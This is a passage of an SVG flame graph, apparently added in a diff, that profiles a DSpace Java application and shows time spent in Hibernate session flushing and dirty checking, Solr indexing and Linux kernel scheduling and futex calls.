+<title>Interpreter (1 samples, 0.15%)</title><rect x="289.3" y="773" width="1.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="292.29" y="783.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::evict (1 samples, 0.15%)</title><rect x="528.4" y="517" width="1.8" height="15.0" fill="rgb(95,242,95)" rx="2" ry="2" />
+<text  x="531.43" y="527.5" ></text>
+</g>
+<g >
+<title>switch_fpu_return (1 samples, 0.15%)</title><rect x="285.8" y="853" width="1.7" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="288.80" y="863.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (34 samples, 5.03%)</title><rect x="44.9" y="885" width="59.4" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="47.91" y="895.5" >entry_..</text>
+</g>
+<g >
+<title>ktime_get_ts64 (1 samples, 0.15%)</title><rect x="968.3" y="277" width="1.8" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="971.31" y="287.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadingAction:::requiresNoCascadeChecking (1 samples, 0.15%)</title><rect x="847.9" y="453" width="1.7" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="850.87" y="463.5" ></text>
+</g>
+<g >
+<title>psi_task_change (1 samples, 0.15%)</title><rect x="41.4" y="773" width="1.8" height="15.0" fill="rgb(253,128,128)" rx="2" ry="2" />
+<text  x="44.42" y="783.5" ></text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (34 samples, 5.03%)</title><rect x="44.9" y="901" width="59.4" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="47.91" y="911.5" >pthrea..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="885" width="1.7" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="292.29" y="895.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%)</title><rect x="554.6" y="389" width="1.8" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="557.62" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::readFrom (1 samples, 0.15%)</title><rect x="936.9" y="437" width="1.7" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="939.89" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/MultipartEntity:::writeTo (2 samples, 0.30%)</title><rect x="954.3" y="389" width="3.5" height="15.0" fill="rgb(69,218,69)" rx="2" ry="2" />
+<text  x="957.35" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntityDeserializer:::doDeserialize (1 samples, 0.15%)</title><rect x="952.6" y="421" width="1.7" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="955.60" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams:::getStream (4 samples, 0.59%)</title><rect x="945.6" y="533" width="7.0" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="948.62" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.15%)</title><rect x="774.6" y="453" width="1.7" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="777.56" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="704.7" y="485" width="1.8" height="15.0" fill="rgb(213,68,68)" rx="2" ry="2" />
+<text  x="707.73" y="495.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.15%)</title><rect x="970.1" y="533" width="1.7" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="973.06" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::listeners (1 samples, 0.15%)</title><rect x="572.1" y="421" width="1.7" height="15.0" fill="rgb(58,207,58)" rx="2" ry="2" />
+<text  x="575.07" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.15%)</title><rect x="1149.9" y="357" width="1.7" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1152.85" y="367.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_one_core (6 samples, 0.89%)</title><rect x="511.0" y="597" width="10.4" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="513.98" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/AppenderSkeleton:::doAppend (3 samples, 0.44%)</title><rect x="945.6" y="389" width="5.3" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="948.62" y="399.5" ></text>
+</g>
+<g >
+<title>_complete_monitor_locking_Java (1 samples, 0.15%)</title><rect x="270.1" y="741" width="1.7" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="273.09" y="751.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (83 samples, 12.28%)</title><rect x="704.7" y="517" width="144.9" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="707.73" y="527.5" >org/hibernate/inte..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (2 samples, 0.30%)</title><rect x="1027.7" y="469" width="3.5" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="1030.66" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.15%)</title><rect x="912.5" y="389" width="1.7" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="915.46" y="399.5" ></text>
+</g>
+<g >
+<title>__tcp_push_pending_frames (9 samples, 1.33%)</title><rect x="509.2" y="789" width="15.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="512.23" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (3 samples, 0.44%)</title><rect x="1151.6" y="501" width="5.2" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="1154.60" y="511.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (32 samples, 4.73%)</title><rect x="46.7" y="741" width="55.8" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="49.66" y="751.5" >__int..</text>
+</g>
+<g >
+<title>__schedule (18 samples, 2.66%)</title><rect x="11.7" y="789" width="31.5" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="14.75" y="799.5" >__..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (2 samples, 0.30%)</title><rect x="1160.3" y="549" width="3.5" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="1163.33" y="559.5" ></text>
+</g>
+<g >
+<title>native_write_msr (16 samples, 2.37%)</title><rect x="13.5" y="725" width="27.9" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="16.49" y="735.5" >n..</text>
+</g>
+<g >
+<title>finish_task_switch (4 samples, 0.59%)</title><rect x="1169.1" y="229" width="6.9" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="1172.05" y="239.5" ></text>
+</g>
+<g >
+<title>tasklet_action_common.isra.0 (1 samples, 0.15%)</title><rect x="1113.2" y="373" width="1.7" height="15.0" fill="rgb(219,79,79)" rx="2" ry="2" />
+<text  x="1116.20" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (15 samples, 2.22%)</title><rect x="797.2" y="469" width="26.2" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="800.25" y="479.5" >o..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (18 samples, 2.66%)</title><rect x="292.8" y="821" width="31.4" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="295.78" y="831.5" >fu..</text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (3 samples, 0.44%)</title><rect x="945.6" y="341" width="5.3" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="948.62" y="351.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.15%)</title><rect x="240.4" y="309" width="1.8" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="243.41" y="319.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (8 samples, 1.18%)</title><rect x="509.2" y="741" width="14.0" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="512.23" y="751.5" ></text>
+</g>
+<g >
+<title>timerqueue_add (1 samples, 0.15%)</title><rect x="10.0" y="773" width="1.7" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="13.00" y="783.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.15%)</title><rect x="1167.3" y="181" width="1.8" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="1170.31" y="191.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (4 samples, 0.59%)</title><rect x="352.1" y="853" width="7.0" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="355.13" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::prepareQueryStatement (1 samples, 0.15%)</title><rect x="1050.4" y="469" width="1.7" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="1053.36" y="479.5" ></text>
+</g>
+<g >
+<title>__schedule (55 samples, 8.14%)</title><rect x="367.8" y="789" width="96.0" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="370.84" y="799.5" >__schedule</text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="266.6" y="853" width="5.2" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="269.60" y="863.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 1.04%)</title><rect x="1177.8" y="853" width="12.2" height="15.0" fill="rgb(208,61,61)" rx="2" ry="2" />
+<text  x="1180.78" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (1 samples, 0.15%)</title><rect x="685.5" y="485" width="1.8" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="688.53" y="495.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.15%)</title><rect x="1167.3" y="197" width="1.8" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="1170.31" y="207.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.15%)</title><rect x="359.1" y="725" width="1.8" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="362.11" y="735.5" ></text>
+</g>
+<g >
+<title>sock_sendmsg (12 samples, 1.78%)</title><rect x="507.5" y="837" width="20.9" height="15.0" fill="rgb(201,51,51)" rx="2" ry="2" />
+<text  x="510.49" y="847.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%)</title><rect x="833.9" y="421" width="1.8" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="836.91" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::reassociateIfUninitializedProxy (2 samples, 0.30%)</title><rect x="736.2" y="453" width="3.4" height="15.0" fill="rgb(64,212,64)" rx="2" ry="2" />
+<text  x="739.15" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (40 samples, 5.92%)</title><rect x="1078.3" y="533" width="69.8" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="1081.28" y="543.5" >org/hib..</text>
+</g>
+<g >
+<title>syscall_slow_exit_work (1 samples, 0.15%)</title><rect x="264.9" y="853" width="1.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="267.85" y="863.5" ></text>
+</g>
+<g >
+<title>JVM_IHashCode (2 samples, 0.30%)</title><rect x="1151.6" y="469" width="3.5" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="1154.60" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (76 samples, 11.24%)</title><rect x="111.2" y="773" width="132.7" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="114.24" y="783.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (6 samples, 0.89%)</title><rect x="690.8" y="453" width="10.4" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="693.77" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%)</title><rect x="757.1" y="437" width="1.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="760.10" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/QueryRequest:::process (2 samples, 0.30%)</title><rect x="1160.3" y="565" width="3.5" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1163.33" y="575.5" ></text>
+</g>
+<g >
+<title>itable stub (2 samples, 0.30%)</title><rect x="687.3" y="453" width="3.5" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="690.28" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="741" width="1.7" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="292.29" y="751.5" ></text>
+</g>
+<g >
+<title>try_to_wake_up (1 samples, 0.15%)</title><rect x="242.2" y="613" width="1.7" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="245.16" y="623.5" ></text>
+</g>
+<g >
+<title>start_thread (79 samples, 11.69%)</title><rect x="106.0" y="917" width="137.9" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="109.01" y="927.5" >start_thread</text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%)</title><rect x="790.3" y="469" width="1.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="793.27" y="479.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable$WrappedPrintWriter:::println (1 samples, 0.15%)</title><rect x="950.9" y="277" width="1.7" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="953.86" y="287.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (1 samples, 0.15%)</title><rect x="1055.6" y="437" width="1.7" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="1058.59" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (54 samples, 7.99%)</title><rect x="591.3" y="485" width="94.2" height="15.0" fill="rgb(54,203,54)" rx="2" ry="2" />
+<text  x="594.27" y="495.5" >org/hiberna..</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="1024.2" y="437" width="1.7" height="15.0" fill="rgb(103,249,103)" rx="2" ry="2" />
+<text  x="1027.17" y="447.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (60 samples, 8.88%)</title><rect x="366.1" y="885" width="104.7" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="369.09" y="895.5" >entry_SYSCAL..</text>
+</g>
+<g >
+<title>__tcp_transmit_skb (8 samples, 1.18%)</title><rect x="509.2" y="757" width="14.0" height="15.0" fill="rgb(223,83,83)" rx="2" ry="2" />
+<text  x="512.23" y="767.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (1 samples, 0.15%)</title><rect x="521.4" y="709" width="1.8" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="524.45" y="719.5" ></text>
+</g>
+<g >
+<title>Ljava/lang/ref/Reference:::tryHandlePending (1 samples, 0.15%)</title><rect x="289.3" y="757" width="1.7" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="292.29" y="767.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="181" width="1.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="241.67" y="191.5" ></text>
+</g>
+<g >
+<title>org/dspace/util/MultiFormatDateParser:::parse (1 samples, 0.15%)</title><rect x="1158.6" y="565" width="1.7" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="1161.58" y="575.5" ></text>
+</g>
+<g >
+<title>__fdget_pos (1 samples, 0.15%)</title><rect x="917.7" y="325" width="1.7" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="920.69" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item_$$_jvst722_4:::getCollections (2 samples, 0.30%)</title><rect x="933.4" y="549" width="3.5" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="936.40" y="559.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (4 samples, 0.59%)</title><rect x="352.1" y="885" width="7.0" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="355.13" y="895.5" ></text>
+</g>
+<g >
+<title>ext4_buffered_write_iter (1 samples, 0.15%)</title><rect x="945.6" y="149" width="1.8" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="948.62" y="159.5" ></text>
+</g>
+<g >
+<title>futex_wait (12 samples, 1.78%)</title><rect x="243.9" y="837" width="21.0" height="15.0" fill="rgb(220,80,80)" rx="2" ry="2" />
+<text  x="246.91" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (1 samples, 0.15%)</title><rect x="1163.8" y="533" width="1.8" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="1166.82" y="543.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="846.1" y="437" width="1.8" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="849.12" y="447.5" ></text>
+</g>
+<g >
+<title>__pthread_mutex_cond_lock (1 samples, 0.15%)</title><rect x="364.3" y="901" width="1.8" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="367.35" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="966.6" y="309" width="1.7" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="969.57" y="319.5" ></text>
+</g>
+<g >
+<title>__x2apic_send_IPI_dest (1 samples, 0.15%)</title><rect x="359.1" y="661" width="1.8" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="362.11" y="671.5" ></text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (2 samples, 0.30%)</title><rect x="933.4" y="533" width="3.5" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="936.40" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (1 samples, 0.15%)</title><rect x="528.4" y="549" width="1.8" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="531.43" y="559.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseEntity (1 samples, 0.15%)</title><rect x="952.6" y="453" width="1.7" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="955.60" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (1 samples, 0.15%)</title><rect x="893.3" y="485" width="1.7" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="896.25" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (6 samples, 0.89%)</title><rect x="531.9" y="453" width="10.5" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="534.92" y="463.5" ></text>
+</g>
+<g >
+<title>__mprotect (2 samples, 0.30%)</title><rect x="360.9" y="821" width="3.4" height="15.0" fill="rgb(211,67,67)" rx="2" ry="2" />
+<text  x="363.86" y="831.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (50 samples, 7.40%)</title><rect x="706.5" y="485" width="87.3" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="709.48" y="495.5" >org/hibern..</text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (2 samples, 0.30%)</title><rect x="556.4" y="405" width="3.5" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="559.36" y="415.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (4 samples, 0.59%)</title><rect x="352.1" y="869" width="7.0" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="355.13" y="879.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (52 samples, 7.69%)</title><rect x="369.6" y="741" width="90.8" height="15.0" fill="rgb(248,121,121)" rx="2" ry="2" />
+<text  x="372.59" y="751.5" >__intel_pm..</text>
+</g>
+<g >
+<title>perf_event_update_userpage (1 samples, 0.15%)</title><rect x="322.5" y="677" width="1.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="325.46" y="687.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (10 samples, 1.48%)</title><rect x="1031.2" y="469" width="17.4" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="1034.15" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (2 samples, 0.30%)</title><rect x="1160.3" y="517" width="3.5" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="1163.33" y="527.5" ></text>
+</g>
+<g >
+<title>Interpreter (4 samples, 0.59%)</title><rect x="945.6" y="469" width="7.0" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="948.62" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::buildDocument (140 samples, 20.71%)</title><rect x="915.9" y="581" width="244.4" height="15.0" fill="rgb(90,236,90)" rx="2" ry="2" />
+<text  x="918.95" y="591.5" >org/dspace/discovery/SolrService..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.15%)</title><rect x="914.2" y="389" width="1.7" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="917.20" y="399.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (18 samples, 2.66%)</title><rect x="292.8" y="885" width="31.4" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="295.78" y="895.5" >en..</text>
+</g>
+<g >
+<title>[libjvm.so] (79 samples, 11.69%)</title><rect x="106.0" y="853" width="137.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="109.01" y="863.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (40 samples, 5.92%)</title><rect x="1078.3" y="501" width="69.8" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="1081.28" y="511.5" >org/hib..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (23 samples, 3.40%)</title><rect x="607.0" y="453" width="40.1" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="609.98" y="463.5" >org..</text>
+</g>
+<g >
+<title>org/apache/commons/configuration/AbstractFileConfiguration:::getProperty (1 samples, 0.15%)</title><rect x="984.0" y="501" width="1.8" height="15.0" fill="rgb(105,250,105)" rx="2" ry="2" />
+<text  x="987.02" y="511.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (12 samples, 1.78%)</title><rect x="243.9" y="741" width="21.0" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="246.91" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeVal (2 samples, 0.30%)</title><rect x="961.3" y="437" width="3.5" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="964.33" y="447.5" ></text>
+</g>
+<g >
+<title>schedule_timeout (14 samples, 2.07%)</title><rect x="474.3" y="773" width="24.5" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="477.32" y="783.5" >s..</text>
+</g>
+<g >
+<title>org/dspace/content/Bitstream:::getName (1 samples, 0.15%)</title><rect x="942.1" y="549" width="1.8" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="945.13" y="559.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (1 samples, 0.15%)</title><rect x="1149.9" y="341" width="1.7" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="1152.85" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::autoFlushIfRequired (33 samples, 4.88%)</title><rect x="991.0" y="517" width="57.6" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="994.01" y="527.5" >org/hi..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (2 samples, 0.30%)</title><rect x="1160.3" y="533" width="3.5" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="1163.33" y="543.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="858.3" y="485" width="1.8" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="861.34" y="495.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/ItemServiceImpl:::getCommunities (2 samples, 0.30%)</title><rect x="933.4" y="565" width="3.5" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="936.40" y="575.5" ></text>
+</g>
+<g >
+<title>event_sched_in.isra.0.part.0 (1 samples, 0.15%)</title><rect x="460.4" y="709" width="1.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="463.36" y="719.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (1 samples, 0.15%)</title><rect x="566.8" y="421" width="1.8" height="15.0" fill="rgb(108,254,108)" rx="2" ry="2" />
+<text  x="569.83" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::containsKey (1 samples, 0.15%)</title><rect x="1149.9" y="389" width="1.7" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="1152.85" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst722_1e:::getHibernateLazyInitializer (1 samples, 0.15%)</title><rect x="1062.6" y="389" width="1.7" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1065.57" y="399.5" ></text>
+</g>
+<g >
+<title>Java_java_io_FileOutputStream_writeBytes (1 samples, 0.15%)</title><rect x="917.7" y="421" width="1.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="920.69" y="431.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.30%)</title><rect x="966.6" y="389" width="3.5" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="969.57" y="399.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.15%)</title><rect x="242.2" y="677" width="1.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="245.16" y="687.5" ></text>
+</g>
+<g >
+<title>switch_fpu_return (1 samples, 0.15%)</title><rect x="43.2" y="853" width="1.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="46.17" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (2 samples, 0.30%)</title><rect x="912.5" y="405" width="3.4" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="915.46" y="415.5" ></text>
+</g>
+<g >
+<title>com/sun/proxy/$Proxy40:::isDirty (13 samples, 1.92%)</title><rect x="1055.6" y="533" width="22.7" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="1058.59" y="543.5" >c..</text>
+</g>
+<g >
+<title>generic_update_time (1 samples, 0.15%)</title><rect x="945.6" y="117" width="1.8" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="948.62" y="127.5" ></text>
+</g>
+<g >
